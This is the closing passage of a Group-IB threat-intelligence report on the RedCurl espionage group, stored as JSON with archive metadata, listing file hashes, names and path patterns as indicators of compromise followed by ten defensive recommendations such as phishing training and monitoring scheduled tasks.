bytes\r\nRedCurl.FSABIN:\r\nRedCurl.CHABIN1:\n\n38\r\n© GROUP−IB\r\nI ndicators of compromise\r\nREDCURL: THE AWAKENING\r\nFilename: %APPDATA%\\Microsoft\\Provision\\cellprovcntrl_0877cae.exe\r\nMD5: 26047d1dd5529cbb74ac684a8ea1656c\r\nSHA1: 57abca2f6fe00e6083cff74171d5efefb3eacebf\r\nSHA256: da4a1247a9442b685b145c12c5c2aa0469d4826557699308eb69044d24a2df9a\r\nPE Timestamp: Wednesday, 28.04.2021 10:29:42 UTC\r\nSize: 130048 bytes\r\nFilename: updorchtls_c30742b.exe\r\nMD5: f9051aa264fba5b5c030f795418c2652\r\nSHA1: f8c96760ee301baf2c24a4991e05eb3c2c155a49\r\nSHA256: 25f10228706b12a5b91240f2606f78827a67655750a0dae53b1a7cd47c1efb63\r\nPE Timestamp: Tuesday, 11.05.2021 10:28:30 UTC\r\nSize: 130048 bytes\r\nTemp\\UGTE%COMPUTERNAME%\\apra%USERNAME%\r\nFileHistory\\FileHistory_[a-f0-9]+\r\nMUI\\LPRemove_[a-f0-9]+\r\n%APPDATA%\\%COMPUTERNAME%.pdf\r\n%APPDATA%\\MTLK%COMPUTERNAME%\\paran%USERNAME%.dll\r\n%LOCALAPPDATA%\\MemoryDiagnosticServices\\[a-z0-9]+.dll\r\n%LOCALAPPDATA%\\MemoryDiagnosticServices\\[a-z0-9]+.exe\r\n%APPDATA%\\AppIDStorage\\convpolchk_b816871.dll\r\n%APPDATA%\\AppIDStorage\\[a-z0-9]+.exe\r\n%APPDATA%\\Microsoft\\Provision\\cellprovcntrl_0877cae.exe\r\n%APPDATA%\\Microsoft\\Provision\\[a-z0-9]+.exe\r\n %APPDATA%\\MUIControl\\[a-z0-9]+.dll\r\n %APPDATA%\\MUIControl\\[a-z0-9]+.exe\r\n%LOCALAPPDATA%\\SubFileHistory\\[a-z0-9]+.dll\r\n%LOCALAPPDATA%\\SubFileHistory\\[a-z0-9]+.exe\r\nRedCurl.CHABIN2:\r\nWindows Task Scheduler’s Name:\r\nFile paths:\n\n39\r\n© GROUP−IB\r\nR ecommendations\r\nREDCURL: THE AWAKENING\r\nRecommendations\r\n1. Use modern email protection measures to prevent initial com-promise. We recommend learning about how Group-IB Atmosphere\r\ncan counter these kinds of attacks effectively.\r\n2. Regularly train employees to make them less susceptible\r\nto phishing in all its forms.\r\n3. Limit access to resources that offer free web hosting or cloud\r\nstorage, excluding those used within the organization.\r\n4. 
Ensure that your security measures allow for proactive\r\nthreat hunting that help identify threats that cannot be detected\r\nautomatically.\r\n5. Keep an eye out for LNK files being created in unusual locations,\r\nincluding network drives.\r\n6. Monitor tasks created in the Scheduler, paying particular atten-tion to those that run executable files from %AppData% and its\r\nsubdirectories.\r\n7. Pay special attention to solutions for working with Active Direc-tory, including built-in tools, which could be used by attackers for\r\nreconnaissance.\r\n8. Monitor any use of commands and built-in tools that are often\r\nused for collecting information about the system and files.\r\n9. Look out for the use of Python scripts, especially on hosts where\r\nthey are not usually used.\r\n10. Use Group-IB Threat Intelligence \u0026 Attribution data to detect\r\nand proactively search for threats.\r\nEach analytical report issued by the Group-IB Threat Intelligence\r\nteam contains recommendations on how to prevent attacks con-ducted by the group(s) analyzed. In this case, Group-IB experts\r\nrecommend taking the following steps:\n\nwww.group-ib.com\r\ngroup-ib.com/blog/\r\ninfo@group-ib.com\r\n+7 495 984 33 64\r\ntwitter.com/groupib\r\nfacebook.com/group-ib\r\nPREVENTING\r\nAND INVESTIGATING\r\nCYBERCRIME\r\nSINCE 2003",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://go.group-ib.com/report-redcurl-awakening-en"
	],
	"report_names": [
		"report-redcurl-awakening-en"
	],
	"threat_actors": [],
	"ts_created_at": 1778121802,
	"ts_updated_at": 1778121851,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/761ecbca0bbb436bdd87f9046aa80dc189c59fda.pdf",
		"text": "https://archive.orkl.eu/761ecbca0bbb436bdd87f9046aa80dc189c59fda.txt",
		"img": "https://archive.orkl.eu/761ecbca0bbb436bdd87f9046aa80dc189c59fda.jpg"
	}
}